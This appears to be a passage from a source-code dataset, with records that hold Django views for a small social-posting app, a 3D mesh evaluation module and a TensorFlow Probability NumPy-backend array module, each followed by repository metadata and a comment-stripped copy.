by_user=request.user, link=reverse('vit_detail', kwargs={'pk': vit.id}))
return JsonResponse({'status': 'success', 'likes': vit.likes.count(), 'liked': True}, status=200)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vits(request):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
vits = Vit.objects.filter(Q(user=request.user) | Q(
user__profile__in=request.user.profile.follows.all()) | Q(user__profile__in=request.user.profile.followed_by.all())).order_by('-date')
return JsonResponse({'vits': [vit.to_json() for vit in vits]})
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
def get_vit(request, id):
user = KeyBackend().authenticate(request)
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=id)
return JsonResponse({'vit': vit.to_json()}, status=200)
except:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
@csrf_exempt
def add_vit(request):
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
form = VitForm(request.POST)
if form.is_valid():
vit = form.save(commit=False)
vit.user = request.user
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def edit_vit(request):
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
form = VitForm(request.POST, instance=vit)
if form.is_valid():
vit = form.save(commit=False)
vit.save()
return JsonResponse({'status': 'success', 'vit': vit.to_json()}, status=201)
else:
return JsonResponse({'error': 'No vit body provided'}, status=400)
else:
return JsonResponse({'error': 'You do not have permission to edit this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
@csrf_exempt
def delete_vit(request):
user = KeyBackend().authenticate(request)
if request.method == "POST":
if request.user.is_authenticated:
try:
vit = Vit.objects.get(id=request.POST.get('vit_pk'))
if vit.user == request.user:
vit.delete()
return JsonResponse({'status': 'success'}, status=200)
else:
return JsonResponse({'error': 'You do not have permission to delete this vit'}, status=403)
except Vit.DoesNotExist:
return JsonResponse({'error': 'Vit not found'}, status=404)
else:
return JsonResponse({'error': 'You must be logged in'}, status=401)
else:
return JsonResponse({'error': 'Invalid request'}, status=400)
| true
| true
|
790c663c396e5ece82b4204d3424a93b2fd0eb35
| 7,912
|
py
|
Python
|
src/eval.py
|
hummat/convolutional_occupancy_networks
|
bb351edff59c196e01aa687943e19fee4ac11077
|
[
"MIT"
] | null | null | null |
src/eval.py
|
hummat/convolutional_occupancy_networks
|
bb351edff59c196e01aa687943e19fee4ac11077
|
[
"MIT"
] | null | null | null |
src/eval.py
|
hummat/convolutional_occupancy_networks
|
bb351edff59c196e01aa687943e19fee4ac11077
|
[
"MIT"
] | null | null | null |
import logging
import numpy as np
import trimesh
from src.common import compute_iou
# from scipy.spatial import cKDTree
from src.utils.libkdtree import KDTree
from src.utils.libmesh import check_mesh_contains
# Maximum values for bounding box [-0.5, 0.5]^3
EMPTY_PCL_DICT = {
'completeness': np.sqrt(3),
'accuracy': np.sqrt(3),
'completeness2': 3,
'accuracy2': 3,
'chamfer': 6,
}
EMPTY_PCL_DICT_NORMALS = {
'normals completeness': -1.,
'normals accuracy': -1.,
'normals': -1.,
}
logger = logging.getLogger(__name__)
class MeshEvaluator(object):
""" Mesh evaluation class.
It handles the mesh evaluation process.
Args:
n_points (int): number of points to be used for evaluation
"""
def __init__(self, n_points=100000):
self.n_points = n_points
def eval_mesh(self,
mesh,
pointcloud_tgt,
normals_tgt,
points_iou,
occ_tgt,
remove_wall=False):
""" Evaluates a mesh.
Args:
mesh (trimesh): mesh which should be evaluated
pointcloud_tgt (numpy array): target point cloud
normals_tgt (numpy array): target normals
points_iou (numpy_array): points tensor for IoU evaluation
occ_tgt (numpy_array): GT occupancy values for IoU points
"""
if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
if remove_wall: # ! Remove walls and floors
pointcloud, idx = mesh.sample(2 * self.n_points, return_index=True)
eps = 0.007
x_max, x_min = pointcloud_tgt[:, 0].max(), pointcloud_tgt[:, 0].min()
y_max, y_min = pointcloud_tgt[:, 1].max(), pointcloud_tgt[:, 1].min()
z_max, z_min = pointcloud_tgt[:, 2].max(), pointcloud_tgt[:, 2].min()
# add small offsets
x_max, x_min = x_max + eps, x_min - eps
y_max, y_min = y_max + eps, y_min - eps
z_max, z_min = z_max + eps, z_min - eps
mask_x = (pointcloud[:, 0] <= x_max) & (pointcloud[:, 0] >= x_min)
mask_y = (pointcloud[:, 1] >= y_min) # floor
mask_z = (pointcloud[:, 2] <= z_max) & (pointcloud[:, 2] >= z_min)
mask = mask_x & mask_y & mask_z
pointcloud_new = pointcloud[mask]
# Subsample
idx_new = np.random.randint(pointcloud_new.shape[0], size=self.n_points)
pointcloud = pointcloud_new[idx_new]
idx = idx[mask][idx_new]
else:
pointcloud, idx = mesh.sample(self.n_points, return_index=True)
pointcloud = pointcloud.astype(np.float32)
normals = mesh.face_normals[idx]
else:
pointcloud = np.empty((0, 3))
normals = np.empty((0, 3))
out_dict = self.eval_pointcloud(pointcloud, pointcloud_tgt, normals, normals_tgt)
if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
occ = check_mesh_contains(mesh, points_iou)
if occ_tgt.min() < 0:
occ_tgt = (occ_tgt <= 0).astype(np.float32)
out_dict['iou'] = compute_iou(occ, occ_tgt)
else:
out_dict['iou'] = 0.
return out_dict
@staticmethod
def eval_pointcloud(pointcloud,
pointcloud_tgt,
normals=None,
normals_tgt=None,
thresholds=np.linspace(1. / 1000, 1, 1000)):
""" Evaluates a point cloud.
Args:
pointcloud (numpy array): predicted point cloud
pointcloud_tgt (numpy array): target point cloud
normals (numpy array): predicted normals
normals_tgt (numpy array): target normals
thresholds (numpy array): threshold values for the F-score calculation
"""
# Return maximum losses if pointcloud is empty
if pointcloud.shape[0] == 0:
logger.warning('Empty pointcloud / mesh detected!')
out_dict = EMPTY_PCL_DICT.copy()
if normals is not None and normals_tgt is not None:
out_dict.update(EMPTY_PCL_DICT_NORMALS)
return out_dict
pointcloud = np.asarray(pointcloud)
pointcloud_tgt = np.asarray(pointcloud_tgt)
# Completeness: how far are the points of the target point cloud from the predicted point cloud
completeness, completeness_normals = distance_p2p(pointcloud_tgt, normals_tgt, pointcloud, normals)
recall = get_threshold_percentage(completeness, thresholds)
completeness2 = completeness ** 2
completeness = completeness.mean()
completeness2 = completeness2.mean()
completeness_normals = completeness_normals.mean()
# Accuracy: how far are the points of the predicted pointcloud from the target pointcloud
accuracy, accuracy_normals = distance_p2p(pointcloud, normals, pointcloud_tgt, normals_tgt)
precision = get_threshold_percentage(accuracy, thresholds)
accuracy2 = accuracy ** 2
accuracy = accuracy.mean()
accuracy2 = accuracy2.mean()
accuracy_normals = accuracy_normals.mean()
# Chamfer distance
chamferL2 = 0.5 * (completeness2 + accuracy2)
normals_correctness = (0.5 * completeness_normals + 0.5 * accuracy_normals)
chamferL1 = 0.5 * (completeness + accuracy)
# F-Score
F = [2 * precision[i] * recall[i] / (precision[i] + recall[i]) for i in range(len(precision))]
out_dict = {
'completeness': completeness,
'accuracy': accuracy,
'normals completeness': completeness_normals,
'normals accuracy': accuracy_normals,
'normals': normals_correctness,
'completeness2': completeness2,
'accuracy2': accuracy2,
'chamfer-L2': chamferL2,
'chamfer-L1': chamferL1,
'f-score': F[9], # threshold = 1.0%
'f-score-15': F[14], # threshold = 1.5%
'f-score-20': F[19], # threshold = 2.0%
}
return out_dict
def distance_p2p(points_src, normals_src, points_tgt, normals_tgt):
""" Computes minimal distances of each point in points_src to points_tgt.
Args:
points_src (numpy array): source points
normals_src (numpy array): source normals
points_tgt (numpy array): target points
normals_tgt (numpy array): target normals
"""
kdtree = KDTree(points_tgt)
dist, idx = kdtree.query(points_src)
if normals_src is not None and normals_tgt is not None:
normals_src = normals_src / np.linalg.norm(normals_src, axis=-1, keepdims=True)
normals_tgt = normals_tgt / np.linalg.norm(normals_tgt, axis=-1, keepdims=True)
normals_dot_product = (normals_tgt[idx] * normals_src).sum(axis=-1)
# Handle normals that point into wrong direction gracefully (mostly due to method not caring about this in generation)
normals_dot_product = np.abs(normals_dot_product)
else:
normals_dot_product = np.array([np.nan] * points_src.shape[0], dtype=np.float32)
return dist, normals_dot_product
def distance_p2m(points, mesh):
""" Compute minimal distances of each point in points to mesh.
Args:
points (numpy array): points array
mesh (trimesh): mesh
"""
_, dist, _ = trimesh.proximity.closest_point(mesh, points)
return dist
def get_threshold_percentage(dist, thresholds):
""" Evaluates a point cloud.
Args:
dist (numpy array): calculated distance
thresholds (numpy array): threshold values for the F-score calculation
"""
in_threshold = [(dist <= t).mean() for t in thresholds]
return in_threshold
| 36.293578
| 126
| 0.605536
|
import logging
import numpy as np
import trimesh
from src.common import compute_iou
from src.utils.libkdtree import KDTree
from src.utils.libmesh import check_mesh_contains
EMPTY_PCL_DICT = {
'completeness': np.sqrt(3),
'accuracy': np.sqrt(3),
'completeness2': 3,
'accuracy2': 3,
'chamfer': 6,
}
EMPTY_PCL_DICT_NORMALS = {
'normals completeness': -1.,
'normals accuracy': -1.,
'normals': -1.,
}
logger = logging.getLogger(__name__)
class MeshEvaluator(object):
def __init__(self, n_points=100000):
self.n_points = n_points
def eval_mesh(self,
mesh,
pointcloud_tgt,
normals_tgt,
points_iou,
occ_tgt,
remove_wall=False):
if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
if remove_wall:
pointcloud, idx = mesh.sample(2 * self.n_points, return_index=True)
eps = 0.007
x_max, x_min = pointcloud_tgt[:, 0].max(), pointcloud_tgt[:, 0].min()
y_max, y_min = pointcloud_tgt[:, 1].max(), pointcloud_tgt[:, 1].min()
z_max, z_min = pointcloud_tgt[:, 2].max(), pointcloud_tgt[:, 2].min()
x_max, x_min = x_max + eps, x_min - eps
y_max, y_min = y_max + eps, y_min - eps
z_max, z_min = z_max + eps, z_min - eps
mask_x = (pointcloud[:, 0] <= x_max) & (pointcloud[:, 0] >= x_min)
mask_y = (pointcloud[:, 1] >= y_min)
mask_z = (pointcloud[:, 2] <= z_max) & (pointcloud[:, 2] >= z_min)
mask = mask_x & mask_y & mask_z
pointcloud_new = pointcloud[mask]
idx_new = np.random.randint(pointcloud_new.shape[0], size=self.n_points)
pointcloud = pointcloud_new[idx_new]
idx = idx[mask][idx_new]
else:
pointcloud, idx = mesh.sample(self.n_points, return_index=True)
pointcloud = pointcloud.astype(np.float32)
normals = mesh.face_normals[idx]
else:
pointcloud = np.empty((0, 3))
normals = np.empty((0, 3))
out_dict = self.eval_pointcloud(pointcloud, pointcloud_tgt, normals, normals_tgt)
if len(mesh.vertices) != 0 and len(mesh.faces) != 0:
occ = check_mesh_contains(mesh, points_iou)
if occ_tgt.min() < 0:
occ_tgt = (occ_tgt <= 0).astype(np.float32)
out_dict['iou'] = compute_iou(occ, occ_tgt)
else:
out_dict['iou'] = 0.
return out_dict
@staticmethod
def eval_pointcloud(pointcloud,
pointcloud_tgt,
normals=None,
normals_tgt=None,
thresholds=np.linspace(1. / 1000, 1, 1000)):
if pointcloud.shape[0] == 0:
logger.warning('Empty pointcloud / mesh detected!')
out_dict = EMPTY_PCL_DICT.copy()
if normals is not None and normals_tgt is not None:
out_dict.update(EMPTY_PCL_DICT_NORMALS)
return out_dict
pointcloud = np.asarray(pointcloud)
pointcloud_tgt = np.asarray(pointcloud_tgt)
completeness, completeness_normals = distance_p2p(pointcloud_tgt, normals_tgt, pointcloud, normals)
recall = get_threshold_percentage(completeness, thresholds)
completeness2 = completeness ** 2
completeness = completeness.mean()
completeness2 = completeness2.mean()
completeness_normals = completeness_normals.mean()
accuracy, accuracy_normals = distance_p2p(pointcloud, normals, pointcloud_tgt, normals_tgt)
precision = get_threshold_percentage(accuracy, thresholds)
accuracy2 = accuracy ** 2
accuracy = accuracy.mean()
accuracy2 = accuracy2.mean()
accuracy_normals = accuracy_normals.mean()
chamferL2 = 0.5 * (completeness2 + accuracy2)
normals_correctness = (0.5 * completeness_normals + 0.5 * accuracy_normals)
chamferL1 = 0.5 * (completeness + accuracy)
F = [2 * precision[i] * recall[i] / (precision[i] + recall[i]) for i in range(len(precision))]
out_dict = {
'completeness': completeness,
'accuracy': accuracy,
'normals completeness': completeness_normals,
'normals accuracy': accuracy_normals,
'normals': normals_correctness,
'completeness2': completeness2,
'accuracy2': accuracy2,
'chamfer-L2': chamferL2,
'chamfer-L1': chamferL1,
'f-score': F[9],
'f-score-15': F[14],
'f-score-20': F[19],
}
return out_dict
def distance_p2p(points_src, normals_src, points_tgt, normals_tgt):
kdtree = KDTree(points_tgt)
dist, idx = kdtree.query(points_src)
if normals_src is not None and normals_tgt is not None:
normals_src = normals_src / np.linalg.norm(normals_src, axis=-1, keepdims=True)
normals_tgt = normals_tgt / np.linalg.norm(normals_tgt, axis=-1, keepdims=True)
normals_dot_product = (normals_tgt[idx] * normals_src).sum(axis=-1)
normals_dot_product = np.abs(normals_dot_product)
else:
normals_dot_product = np.array([np.nan] * points_src.shape[0], dtype=np.float32)
return dist, normals_dot_product
def distance_p2m(points, mesh):
_, dist, _ = trimesh.proximity.closest_point(mesh, points)
return dist
def get_threshold_percentage(dist, thresholds):
in_threshold = [(dist <= t).mean() for t in thresholds]
return in_threshold
| true
| true
|
790c66547531536f4bc1eeec53b6e037c55a0e43
| 14,452
|
py
|
Python
|
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
simeoncarstens/probability
|
054a720ff9f221dd9660acd7ce7fb38a1dbb1290
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
simeoncarstens/probability
|
054a720ff9f221dd9660acd7ce7fb38a1dbb1290
|
[
"Apache-2.0"
] | 2
|
2021-08-25T16:14:51.000Z
|
2022-02-10T04:47:11.000Z
|
tensorflow_probability/python/internal/backend/numpy/numpy_array.py
|
michalbrys/probability
|
054a720ff9f221dd9660acd7ce7fb38a1dbb1290
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy implementations of TensorFlow general top-level functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
# Dependency imports
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import _utils as utils
from tensorflow_probability.python.internal.backend.numpy import ops
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import einsum
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import norm
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import tensordot
__all__ = [
'concat',
'einsum',
'expand_dims',
'fill',
'gather',
'gather_nd',
'linspace',
'meshgrid',
'norm',
'one_hot',
'ones',
'ones_like',
'pad',
'range',
'rank',
'reshape',
'reverse',
'repeat',
'roll',
'searchsorted',
'shape',
'size',
'slice',
'split',
'squeeze',
'stack',
'tensordot',
'tile',
'transpose',
'unstack',
'where',
'zeros',
'zeros_like',
# 'boolean_mask',
# 'foldl',
# 'foldr',
]
JAX_MODE = False
if JAX_MODE:
import jax # pylint: disable=g-import-not-at-top
def _astuple(x):
try:
return tuple(x)
except TypeError:
return x
def _gather( # pylint: disable=unused-argument
params,
indices,
validate_indices=None,
axis=None,
batch_dims=0,
name=None):
"""gather."""
indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
if validate_indices is not None:
raise NotImplementedError(
'Argument `validate_indices != None` is currently unimplemented.')
if batch_dims < 0:
raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
if axis is None:
axis = batch_dims
if axis < 0:
axis = axis + len(params.shape)
# NOTE: For only the numpy backend, this function could create a single result
# ndarray and use in-place updates. For the Jax backend, this function
# vmaps `np.take`.
if JAX_MODE:
take = lambda params, indices: np.take(params, indices, # pylint: disable=g-long-lambda
axis=axis - batch_dims)
take = functools.reduce(
lambda g, f: f(g), [jax.vmap] * int(batch_dims),
take
)
return take(params, indices)
params = ops.convert_to_tensor(params)
res = np.array([
np.take(params[i], indices[i], axis=axis - batch_dims)
for i in np.ndindex(*params.shape[:batch_dims])
])
return np.reshape(
res,
params.shape[:axis] + indices.shape[batch_dims:] + params.shape[axis+1:])
def _args_to_matching_arrays(args_list, dtype_hint=None):
"""Converts a list to array using the first element for dtype.
This method is used to match the behavior of `tf.concat`.
Args:
args_list: A list or tuple of arguments.
dtype_hint: An optional hint used when converting the args to tensors.
Returns:
A list of tensors.
"""
dtype = None
for arg in args_list:
if ops.is_tensor(arg):
dtype = arg.dtype
break
if dtype is None:
ret = []
for arg in args_list:
ret.append(ops.convert_to_tensor(arg, dtype, dtype_hint=dtype_hint))
if dtype is None:
dtype = ret[-1].dtype
else:
ret = [ops.convert_to_tensor(arg, dtype) for arg in args_list]
return ret
def _concat(values, axis, name='concat'):
del name
if axis is None:
raise ValueError('None values for `axis` argument not supported.')
if not isinstance(values, (list, tuple)):
values = [values]
if len(values) == 1:
return values[0]
values = _args_to_matching_arrays(values)
return np.concatenate(values, axis=axis)
def _gather_nd_single(params, indices):
idx = tuple(np.moveaxis(indices, -1, 0))
return params[idx]
def _gather_nd( # pylint: disable=unused-argument
params,
indices,
batch_dims=0,
name=None):
"""gather_nd."""
indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
if batch_dims < 0:
raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
if not JAX_MODE and batch_dims > 0:
raise NotImplementedError(
'`batch_dims > 0` currently unsupported in NumPy backend.')
gather_nd_ = _gather_nd_single
if JAX_MODE:
gather_nd_ = functools.reduce(
lambda g, f: f(g), [jax.vmap] * int(batch_dims),
gather_nd_
)
return gather_nd_(params, indices)
def _linspace(start, stop, num, name=None, axis=0): # pylint: disable=unused-argument
"""Match TF behavior with np.linspace."""
start = ops.convert_to_tensor(start)
# Match TF weirdness arising from truediv(int32, int32) = float64
if np.issubdtype(start.dtype, np.integer):
start = start.astype(np.float64)
stop = ops.convert_to_tensor(stop, dtype=start.dtype)
num = ops.convert_to_tensor(num, dtype_hint=np.int32)
if not np.issubdtype(num.dtype, np.integer):
raise TypeError('`num` must be an integer but got {}'.format(num.dtype))
num = num.astype(np.int32)
return np.linspace(start, stop, num, axis=axis).astype(start.dtype)
def _one_hot( # pylint: disable=unused-argument
indices,
depth,
on_value=None,
off_value=None,
axis=None,
dtype=None,
name=None):
"""One hot."""
if on_value is None:
on_value = 1
if off_value is None:
off_value = 0
if dtype is None:
dtype = utils.common_dtype([on_value, off_value], np.float32)
indices = np.array(indices)
depth = np.array(depth)
pred = abs(np.arange(depth, dtype=indices.dtype) -
indices[..., np.newaxis]) > 0
y_out = np.where(pred, np.array(off_value, dtype), np.array(on_value, dtype))
if axis is not None:
y_out = np.moveaxis(y_out, -1, axis)
return y_out
def _ones_like(input, dtype=None, name=None): # pylint: disable=redefined-builtin,unused-argument
return np.ones_like(input, dtype=utils.numpy_dtype(dtype))
# TODO(b/136555907): Add unit-test.
def _pad( # pylint: disable=unused-argument
tensor,
paddings,
mode='CONSTANT',
constant_values=0,
name=None):
return np.pad(
tensor, paddings,
mode=mode.lower(),
constant_values=constant_values)
def _range(start, limit=None, delta=1, dtype=None, name='range'): # pylint: disable=unused-argument
"""Emulates tf.range."""
# Emulating dtype inference logic from tf.range
dtype = utils.numpy_dtype(dtype)
start = ops.convert_to_tensor(start, dtype=dtype)
limit = None if limit is None else ops.convert_to_tensor(limit, dtype=dtype)
delta = ops.convert_to_tensor(delta, dtype=dtype)
if dtype is None:
dtype_hierarchy = [np.int32, np.int64, np.float32, np.float64]
inferred_dtype = max([arg.dtype for arg in [start, limit, delta]
if arg is not None],
key=dtype_hierarchy.index)
else:
inferred_dtype = dtype
return np.arange(start, limit, delta).astype(inferred_dtype)
def _reverse(tensor, axis, name=None): # pylint: disable=unused-argument
if np.array(axis).ndim == 0:
return np.flip(tensor, axis)
for ax in axis:
tensor = np.flip(tensor, ax)
return tensor
if JAX_MODE:
_searchsorted_vmap_sides = {
side: jax.vmap(functools.partial(jax.numpy.searchsorted, side=side))
for side in ('left', 'right')
}
def _searchsorted( # pylint: disable=unused-argument
sorted_sequence,
values,
side='left',
out_type=np.int32,
name=None):
"""Find indices for insertion for list to remain sorted."""
if JAX_MODE:
try:
func = _searchsorted_vmap_sides[side]
except KeyError:
raise ValueError("'%s' is an invalid value for keyword 'side'" % side)
sorted_sequence_2d = np.reshape(sorted_sequence,
(-1, sorted_sequence.shape[-1]))
values_2d = np.reshape(values, (-1, values.shape[-1]))
if sorted_sequence_2d.shape[0] != values_2d.shape[0]:
raise ValueError('Leading dim_size of both tensors must match.')
return np.reshape(func(sorted_sequence_2d, values_2d).astype(out_type),
values.shape)
# We don't use np.searchsorted in the numpy backend because it doesn't support
# batching.
sorted_sequence = sorted_sequence[..., np.newaxis, :]
values = values[..., :, np.newaxis]
if side == 'left':
is_in_right_location = sorted_sequence < values
elif side == 'right':
is_in_right_location = sorted_sequence <= values
return np.sum(is_in_right_location, axis=-1).astype(out_type)
def _shape(input, out_type=np.int32, name=None): # pylint: disable=redefined-builtin,unused-argument
return ops.convert_to_tensor(ops.convert_to_tensor(input).shape).astype(
out_type)
def _size(input, out_type=np.int32, name=None): # pylint: disable=redefined-builtin, unused-argument
return np.asarray(np.prod(ops.convert_to_tensor(input).shape), dtype=out_type)
builtin_slice = slice # pylint: disable=invalid-name
def _slice(input_, begin, size, name=None): # pylint: disable=unused-argument,redefined-outer-name
slices = tuple(
builtin_slice(b, b + s if s != -1 else None) for b, s in zip(begin, size))
return input_[slices]
def _split(value, num_or_size_splits, axis=0, num=None, name='split'): # pylint: disable=unused-argument
"""Map tf.split -> np.split."""
indices_or_sections = np.array(num_or_size_splits)
if indices_or_sections.ndim == 1:
if any(idx == -1 for idx in indices_or_sections):
# Numpy parameterizes by split indices and returns nsplits+1 arrays.
total_splits = sum(idx for idx in indices_or_sections if idx != -1)
remainder = int(max(0, np.array(value).shape[axis] - total_splits))
indices_or_sections = [
idx if idx != -1 else remainder for idx in indices_or_sections
]
indices_or_sections = np.cumsum(np.array(indices_or_sections))[:-1]
return np.split(value, indices_or_sections, axis)
def _stack(values, axis=0, name='stack'):
del name
if axis is None:
raise ValueError('None values for `axis` argument not supported.')
values = _args_to_matching_arrays(values)
return np.stack(values, axis=axis)
def _transpose(a, perm=None, conjugate=False, name='transpose'): # pylint: disable=unused-argument
x = np.transpose(a, perm)
return np.conjugate(x) if conjugate else x
def _zeros_like(input, dtype=None, name=None): # pylint: disable=redefined-builtin,unused-argument
return np.zeros_like(input, dtype=utils.numpy_dtype(dtype))
# --- Begin Public Functions --------------------------------------------------
concat = utils.copy_docstring(
'tf.concat',
_concat)
expand_dims = utils.copy_docstring(
'tf.expand_dims',
lambda input, axis, name=None: np.expand_dims(input, axis))
fill = utils.copy_docstring(
'tf.fill',
lambda dims, value, name=None: np.full(dims, value))
gather = utils.copy_docstring(
'tf.gather',
_gather)
gather_nd = utils.copy_docstring(
'tf.gather_nd',
_gather_nd)
reverse = utils.copy_docstring('tf.reverse', _reverse)
linspace = utils.copy_docstring(
'tf.linspace',
_linspace)
meshgrid = utils.copy_docstring(
'tf.meshgrid',
np.meshgrid)
norm = utils.copy_docstring(
'tf.norm',
norm)
one_hot = utils.copy_docstring(
'tf.one_hot',
_one_hot)
ones = utils.copy_docstring(
'tf.ones',
lambda shape, dtype=np.float32, name=None: np.ones( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
ones_like = utils.copy_docstring(
'tf.ones_like',
_ones_like)
pad = utils.copy_docstring(
'tf.pad',
_pad)
range = utils.copy_docstring( # pylint: disable=redefined-builtin
'tf.range',
_range)
rank = utils.copy_docstring(
'tf.rank',
lambda input, name=None: np.int32(np.array(input).ndim)) # pylint: disable=redefined-builtin,g-long-lambda
repeat = utils.copy_docstring(
'tf.repeat',
lambda input, repeats, axis=None, name=None: np.repeat( # pylint: disable=g-long-lambda
input, repeats, axis=axis))
reshape = utils.copy_docstring(
'tf.reshape',
lambda tensor, shape, name=None: np.reshape( # pylint: disable=g-long-lambda
ops.convert_to_tensor(tensor), shape))
roll = utils.copy_docstring(
'tf.roll',
lambda input, shift, axis: np.roll(input, shift, axis)) # pylint: disable=unnecessary-lambda
searchsorted = utils.copy_docstring(
'tf.searchsorted',
_searchsorted)
shape = utils.copy_docstring(
'tf.shape',
_shape)
size = utils.copy_docstring(
'tf.size',
_size)
slice = utils.copy_docstring( # pylint: disable=redefined-builtin
'tf.slice', _slice)
split = utils.copy_docstring('tf.split', _split)
squeeze = utils.copy_docstring(
'tf.squeeze',
lambda input, axis=None, name=None: np.squeeze(input, _astuple(axis)))
stack = utils.copy_docstring(
'tf.stack',
_stack)
tile = utils.copy_docstring(
'tf.tile',
lambda input, multiples, name=None: np.tile(np.array(input), multiples))
transpose = utils.copy_docstring(
'tf.transpose',
_transpose)
unstack = utils.copy_docstring(
'tf.unstack',
lambda value, num=None, axis=0, name='unstack': tuple( # pylint: disable=g-long-lambda
np.squeeze(x, axis=axis) for x in
np.split(value, value.shape[axis] if num is None else num, axis)))
where = utils.copy_docstring(
'tf.where',
lambda condition, x=None, y=None, name=None: np.where(condition, x, y))
zeros = utils.copy_docstring(
'tf.zeros',
lambda shape, dtype=np.float32, name=None: np.zeros( # pylint: disable=g-long-lambda
shape, utils.numpy_dtype(dtype)))
zeros_like = utils.copy_docstring(
'tf.zeros_like',
_zeros_like)
| 29.736626
| 111
| 0.679076
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import _utils as utils
from tensorflow_probability.python.internal.backend.numpy import ops
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import einsum
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import norm
from tensorflow_probability.python.internal.backend.numpy.linalg_impl import tensordot
__all__ = [
'concat',
'einsum',
'expand_dims',
'fill',
'gather',
'gather_nd',
'linspace',
'meshgrid',
'norm',
'one_hot',
'ones',
'ones_like',
'pad',
'range',
'rank',
'reshape',
'reverse',
'repeat',
'roll',
'searchsorted',
'shape',
'size',
'slice',
'split',
'squeeze',
'stack',
'tensordot',
'tile',
'transpose',
'unstack',
'where',
'zeros',
'zeros_like',
]
JAX_MODE = False
if JAX_MODE:
import jax
def _astuple(x):
try:
return tuple(x)
except TypeError:
return x
def _gather(
params,
indices,
validate_indices=None,
axis=None,
batch_dims=0,
name=None):
indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
if validate_indices is not None:
raise NotImplementedError(
'Argument `validate_indices != None` is currently unimplemented.')
if batch_dims < 0:
raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
if axis is None:
axis = batch_dims
if axis < 0:
axis = axis + len(params.shape)
if JAX_MODE:
take = lambda params, indices: np.take(params, indices,
axis=axis - batch_dims)
take = functools.reduce(
lambda g, f: f(g), [jax.vmap] * int(batch_dims),
take
)
return take(params, indices)
params = ops.convert_to_tensor(params)
res = np.array([
np.take(params[i], indices[i], axis=axis - batch_dims)
for i in np.ndindex(*params.shape[:batch_dims])
])
return np.reshape(
res,
params.shape[:axis] + indices.shape[batch_dims:] + params.shape[axis+1:])
def _args_to_matching_arrays(args_list, dtype_hint=None):
dtype = None
for arg in args_list:
if ops.is_tensor(arg):
dtype = arg.dtype
break
if dtype is None:
ret = []
for arg in args_list:
ret.append(ops.convert_to_tensor(arg, dtype, dtype_hint=dtype_hint))
if dtype is None:
dtype = ret[-1].dtype
else:
ret = [ops.convert_to_tensor(arg, dtype) for arg in args_list]
return ret
def _concat(values, axis, name='concat'):
del name
if axis is None:
raise ValueError('None values for `axis` argument not supported.')
if not isinstance(values, (list, tuple)):
values = [values]
if len(values) == 1:
return values[0]
values = _args_to_matching_arrays(values)
return np.concatenate(values, axis=axis)
def _gather_nd_single(params, indices):
idx = tuple(np.moveaxis(indices, -1, 0))
return params[idx]
def _gather_nd(
params,
indices,
batch_dims=0,
name=None):
indices = ops.convert_to_tensor(indices, dtype_hint=np.int32)
if batch_dims < 0:
raise NotImplementedError('Negative `batch_dims` is currently unsupported.')
if not JAX_MODE and batch_dims > 0:
raise NotImplementedError(
'`batch_dims > 0` currently unsupported in NumPy backend.')
gather_nd_ = _gather_nd_single
if JAX_MODE:
gather_nd_ = functools.reduce(
lambda g, f: f(g), [jax.vmap] * int(batch_dims),
gather_nd_
)
return gather_nd_(params, indices)
def _linspace(start, stop, num, name=None, axis=0):
start = ops.convert_to_tensor(start)
if np.issubdtype(start.dtype, np.integer):
start = start.astype(np.float64)
stop = ops.convert_to_tensor(stop, dtype=start.dtype)
num = ops.convert_to_tensor(num, dtype_hint=np.int32)
if not np.issubdtype(num.dtype, np.integer):
raise TypeError('`num` must be an integer but got {}'.format(num.dtype))
num = num.astype(np.int32)
return np.linspace(start, stop, num, axis=axis).astype(start.dtype)
def _one_hot(
indices,
depth,
on_value=None,
off_value=None,
axis=None,
dtype=None,
name=None):
if on_value is None:
on_value = 1
if off_value is None:
off_value = 0
if dtype is None:
